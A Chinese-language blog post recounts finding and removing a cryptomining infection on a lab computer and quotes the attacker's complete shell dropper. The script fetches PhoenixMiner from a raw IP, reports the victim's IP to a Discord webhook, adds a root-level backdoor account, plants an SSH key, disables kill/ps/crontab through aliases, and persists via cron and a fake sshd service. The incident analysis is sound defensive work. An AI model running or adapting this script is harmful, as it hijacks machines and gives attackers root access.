记一次 挖矿程序入侵和处理
为了方便远程使用,师弟把实验室的电脑映射的公网上,结果被植入了挖矿程序
挖矿软件是这个,因为已经被清理掉了,所以看不到运行了,不然的话,使用 nvidia-smi 命令可以看到这个挖矿程序在工作。
然后进入到这个进程中, cd /proc/$PID , 查看它的信息
首先查看所有文件,可以看到挖矿程序被放到这个位置
通过 cat status 可以查看进程信息
其中PPID标识了进程的父类信息,这里我是在复现,所以父进程是4168,原本父进程是 2
然后把父进程杀死,把挖矿进程杀死,杀死挖矿程序。结果过一会挖矿程序又出现了,推测有定时执行任务,并且重启也不行。
首先查看开机自启脚本是否正常
vim /etc/rc.local
这个文件是正常的,说明不是放到这的。
然后检查root账户的 .bashrc 文件
vim ~/.bashrc
里面只有这么几行,这个明显是屏蔽掉了删除命令。切换到root账户,发现很多命令都被屏蔽掉了,那么肯定是出问题,但是这个文件又没有
运行挖矿程序。考虑定时任务,查看是否设置了crontab
ps -aux | grep crontab
发现果然存在定时任务,然后查看一下定时任务
crontab -e
可以看到这几个奇怪的任务,这里我给注释掉了
然后到 /var/tmp/.tmp/下看这几个文件
#!/bin/bash m1lbe1() { if ! pgrep -x PhoenixMiner >/dev/null then cd /var/tmp/.tmp/PhoenixMiner ./PhoenixMiner -pool ssl://eth-asia1.nanopool.org:9433 -wal 0xd281ffdd4fb30987b7fe4f8721b022f4b4ffc9f8.sclipiciNR1/sclipicinr1@gmail.com >/dev/null 2>&1 & disown $* else exit; fi } m1lbe1
#!/bin/bash ###Date### user="sclipicibosu" pass="saieilamuie" gilimea='"' ip=`/usr/bin/curl -s -connect-timeout 4 -m 4 ifconfig.me` rm -rf *timeout sshkey="ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAplmD9EFVf28OUB8tK/qJYG4ggMAw9PJzJU1AONgB5FV9w1hxxmP/+vVUfj7HgaTPB94IW4svaMe3vMTkmYm/0y9Zrh8Q2r6f/r1OqpwQU3ThLR6quOAtl7TW7y4VIQ/wxXOffINAIrEv7mi8D0XgpkiFwIUoblZY0ErPjBwy0WFqua2Z0qxx1bHoznDxPOsHMRxSge4DYA0gADttEWz8x1NZFcjMql8OOQ5IpZRsHxlO4cBVG37WyYpL7NYGF0gqnRRFSXBGduQph1dsEf3KFo83/QaSg+mm+EQiFrbVeqpm9tDjiFazbrwsw0YhT47yzKPi+Tews16sIHAvs5KZkw== sclipicibosu" nenea=`whoami` uptime=$(</proc/uptime) uptime=${uptime%%.*} zile=$(( uptime/60/60/24 )) secunde=$(( uptime%60 )) minute=$(( uptime/60%60 )) ore=$(( uptime/60/60%24 )) sended=$(date +'%m/%d/%Y') url='https://discord.com/api/webhooks/821345448212037685/UIO1CteG8cl6DerrO6fbI0ldKGk90H36NeNpXH56aYNbCBd1UZ31J89CR5ZBRSd9c3xj' ########## getingmineru(){ locatie="$(cat /var/tmp/.ladyg0g0/.pr1nc35)" if [ -f $locatie/PhoenixMiner ]; then : else curl -s -L -O 45.32.112.68/.mini/PhoenixMiner.tar tar xvf PhoenixMiner.tar chmod 777 PhoenixMiner/* fi } ### locationperfection(){ tinlex=$(pwd) mkdir /var/tmp/.ladyg0g0/ >/dev/null 2>&1 echo $tinlex > "/var/tmp/.ladyg0g0/.pr1nc35" if [ $(id -u) = 0 ]; then if [ -f "/usr/bin/.locationesclipiciu" ]; then : else echo $tinlex > "/usr/bin/.locationesclipiciu" fi fi } ### showproof(){ echo ' { "content": null, "embeds": [ { "title": "Miner ON: Ip: '$ip' | Pe User: '$nenea' ", "description": "**Cand s-a facut Install-ul:** ***'$sended'***\n\n**Other Info:** ***Version: 3.0*** **| Uptime Miner:** ***'$zile'*** **Zile**", "color": 16711680 } ] }' > /tmp/.send.json /usr/bin/curl -H "Content-Type: application/json" --data @/tmp/.send.json $url } ### sshkiller(){ if [ $(id -u) = 0 ]; then mkdir /usr/.SQL-Unix mkdir /usr/.SQL-Unix/.SQL echo "# .bashrc ############ rm -rf ~/.bashrc rm -rf ~/.bash_history alias pkill='printf $gilimea$gilimea' alias kill='printf $gilimea$gilimea' alias killall='printf $gilimea$gilimea' alias init='printf $gilimea$gilimea' alias rm='printf $gilimea$gilimea' alias halt='printf $gilimea$gilimea' alias adduser='printf $gilimea$gilimea' alias userdel='printf $gilimea$gilimea' alias crontab='printf $gilimea$gilimea' alias htop='printf $gilimea$gilimea' alias find='printf $gilimea$gilimea' alias locate='printf $gilimea$gilimea' alias ps='printf $gilimea$gilimea' alias ss='printf $gilimea$gilimea' alias netstat='printf $gilimea$gilimea' ############ echo '# .bashrc source /usr/.SQL-Unix/.SQL/.db alias rm='rm -i' alias cp='cp -i' alias mv='mv -i' echo Uname: $(uname -a) ' > ~/.bashrc " > /usr/.SQL-Unix/.SQL/.db echo "# .bashrc source /usr/.SQL-Unix/.SQL/.db alias rm='rm -i' alias cp='cp -i' alias mv='mv -i' echo Uname: $(uname -a) " > ~/.bashrc echo " if [ -f ~/.bashrc ]; then . ~/.bashrc fi " > ~/.bash_profile chattr -i /root/.ssh ; chattr -i /root/.ssh/authorized_keys echo $sshkey > "/root/.ssh/authorized_keys" chmod 600 /root/.ssh/authorized_keys chattr +i /root/.ssh/authorized_keys else mkdir /var/tmp/.SQL-Unix > /dev/null 2>&1 mkdir /var/tmp/.SQL-Unix/.SQL > /dev/null 2>&1 echo "# .bashrc ############ rm -rf ~/.bashrc rm -rf ~/.bash_history alias pkill='printf $gilimea$gilimea' alias kill='printf $gilimea$gilimea' alias killall='printf $gilimea$gilimea' alias init='printf $gilimea$gilimea' alias rm='printf $gilimea$gilimea' alias halt='printf $gilimea$gilimea' alias adduser='printf $gilimea$gilimea' alias userdel='printf $gilimea$gilimea' alias crontab='printf $gilimea$gilimea' alias htop='printf $gilimea$gilimea' alias find='printf $gilimea$gilimea' alias locate='printf $gilimea$gilimea' alias ps='printf $gilimea$gilimea' alias ss='printf $gilimea$gilimea' alias netstat='printf $gilimea$gilimea' ############ echo '# .bashrc source /var/tmp/.SQL-Unix/.SQL/.db alias rm='rm -i' alias cp='cp -i' alias mv='mv -i' echo Uname: $(uname -a) ' > ~/.bashrc " > /var/tmp/.SQL-Unix/.SQL/.db echo "# .bashrc source /var/tmp/.SQL-Unix/.SQL/.db alias rm='rm -i' alias cp='cp -i' alias mv='mv -i' echo Uname: $(uname -a) " > ~/.bashrc echo " if [ -f ~/.bashrc ]; then . ~/.bashrc fi " > ~/.bash_profile fi } ### facuser(){ if [ $(id -u) = 0 ]; then if ! cat /etc/passwd | grep -q "${user}"; then /usr/sbin/useradd -u0 -g0 -o -s /bin/bash $user ; usermod -aG sudo $user yes "$pass" | passwd $user else : fi fi } ### minerinio(){ locatie="$(pwd)" if [ -f $locatie/.b4nd1d0 ] then locatie="$(pwd)" echo '#!/bin/bash m1lbe1() { if ! pgrep -x PhoenixMiner >/dev/null then cd '$locatie'/PhoenixMiner ./PhoenixMiner -pool ssl://eth-asia1.nanopool.org:9433 -wal 0xd281ffdd4fb30987b7fe4f8721b022f4b4ffc9f8.sclipiciNR1/sclipicinr1@gmail.com >/dev/null 2>&1 & disown $* else exit; fi } m1lbe1' > $locatie/.b4nd1d0 chmod 777 $locatie/.b4nd1d0 $locatie/./.b4nd1d0 else locatie="$(pwd)" echo '#!/bin/bash m1lbe1() { if ! pgrep -x PhoenixMiner >/dev/null then cd '$locatie'/PhoenixMiner ./PhoenixMiner -pool ssl://eth-asia1.nanopool.org:9433 -wal 0xd281ffdd4fb30987b7fe4f8721b022f4b4ffc9f8.sclipiciNR1/sclipicinr1@gmail.com >/dev/null 2>&1 & disown $* else exit; fi } m1lbe1' > $locatie/.b4nd1d0 chmod 777 $locatie/.b4nd1d0 $locatie/./.b4nd1d0 fi } ### crontablegend() { locatie="$(pwd)" if ! crontab -l | grep -q '.placi'; then rm -rf $locatie/.5p4rk3l5 echo "@daily "$locatie"/./.b4nd1d0" >> $locatie/.5p4rk3l5 sleep 1 echo "@reboot "$locatie"/./.placi > /dev/null 2>&1 & disown" >> $locatie/.5p4rk3l5 sleep 1 echo "* * * * * "$locatie"/./.placi > /dev/null 2>&1 & disown" >> $locatie/.5p4rk3l5 sleep 1 echo "@monthly "$locatie"/./.placi > /dev/null 2>&1 & disown" >> $locatie/.5p4rk3l5 sleep 1 crontab $locatie/.5p4rk3l5 sleep 1 source ~/.bashrc rm -rf $locatie/.5p4rk3l5 fi } ### locationperfection sleep 0.5 echo "Locatie ON" wait getingmineru sleep 0.5 echo "Minerul Luat" wait facuser sleep 0.5 echo "User Facut" wait sshkiller sleep 0.5 echo "SSH Mort" wait showproof sleep 0.5 echo "Info Trimis" wait crontablegend sleep 0.5 echo "Crontab Done" wait minerinio sleep 0.5 echo "Minerul Pornit" wait ### checkingpid(){ if [ -f /usr/bin/.pidsclip ]; then if ps -p $(cat /usr/bin/.pidsclip) > /dev/null; then echo "Already running..." else /usr/bin/sshd > /dev/null 2>&1 & disown echo $! > /usr/bin/.pidsclip chmod 777 /usr/bin/.pidsclip echo "Done" fi else /usr/bin/sshd > /dev/null 2>&1 & disown echo $! > /usr/bin/.pidsclip chmod 777 /usr/bin/.pidsclip echo "Done" fi } ### killingstrangers(){ echo ' #!/bin/bash locatieasdf=$(cat /usr/bin/.locationesclipiciu) if [ ! -d '$locatieasdf' ]; then mkdir '$locatieasdf' rsync -r /usr/bin/.locationesclipiciu/ '$locatieasdf'/ sleep 1 '$locatieasdf'/.b4nd1d0 > /dev/null 2>&1 & disown else if [ ! -f '$locatieasdf'/PhoenixMiner ]; then rsync -r /usr/bin/.locationesclipiciu/ '$locatieasdf'/ sleep 1 '$locatieasdf'/.b4nd1d0 > /dev/null 2>&1 & disown fi' > /usr/bin/sshd sleep 1 chmod 777 /usr/bin/sshd } ### pisamsystemu(){ echo '[Unit] Description=Example systemd service. [Service] Type=simple Restart=always RestartSec=3600 ExecStart=/bin/bash /usr/bin/sshd [Install] WantedBy=multi-user.target' > /lib/systemd/system/myservice.service sleep 1 chmod 644 /lib/systemd/system/myservice.service systemctl enable myservice systemctl start myservice if [ -f "/var/tmp/.ladyg0g0/.pr1nc35" ]; then echo "Locatia este deja setata" else if [ -f "/usr/bin/.locationesclipiciu" ]; then locationperfection echo "Am-rupt-locatiile-alea" sleep 1 fi fi if [ ! -f "/var/tmp/.ladyg0g0/.pr1nc35" ]; then if [ -d "/var/tmp/.ladyg0g0" ]; then locationperfection locationperfection echo "Locatia a fost setata" else echo "Acum facem folderul" mkdir /var/tmp/.ladyg0g0/ locationperfection locationperfection echo "Am setat locatia" fi fi if [ -f $(cat /var/tmp/.ladyg0g0/.pr1nc35)/.pidsclip ]; then if ps -p $(cat $(cat /var/tmp/.ladyg0g0/.pr1nc35)/.pidsclip) > /dev/null; then echo "Already running..." else $(cat /var/tmp/.ladyg0g0/.pr1nc35)/.placi > /dev/null 2>&1 & disown echo $! > $(cat /var/tmp/.ladyg0g0/.pr1nc35)/.pidsclip chmod 777 $(cat /var/tmp/.ladyg0g0/.pr1nc35)/.pidsclip echo "Done" fi else $(cat /var/tmp/.ladyg0g0/.pr1nc35)/.placi > /dev/null 2>&1 & disown echo $! > $(cat /var/tmp/.ladyg0g0/.pr1nc35)/.pidsclip chmod 777 $(cat /var/tmp/.ladyg0g0/.pr1nc35)/.pidsclip echo "Done" fi } ### if [ $(id -u) = 0 ]; then if [ ! -d /usr/bin/.locationesclipiciu ]; then cp -avr $(cat /var/tmp/.ladyg0g0/.pr1nc35) /usr/bin/.locationesclipiciu >/dev/null 2>&1 & disown bash -c 'yum install -y rsync >/dev/null 2>&1 & disown' || bash -c 'apt install -y rsync >/dev/null 2>&1 & disown' if [ ! -f /usr/bin/sshd ]; then killingstrangers pisamsystemu checkingpid fi fi fi ###
可以看到这个人果然是在这里做了些操作,然后它把.bashrc文件重写,这也是我们之前查看没有直接发现问题的原因。其实如果它把.bashrc先备份一下,
然后执行完病毒再恢复,这样会更隐蔽。可能是个新手叭(虽然我找这个病毒也是找了好久。。)
至此,挖矿病毒就被清理掉了,吓的我也是赶紧把内网映射关掉了。果然有的人为了钱,啥事都能干。。
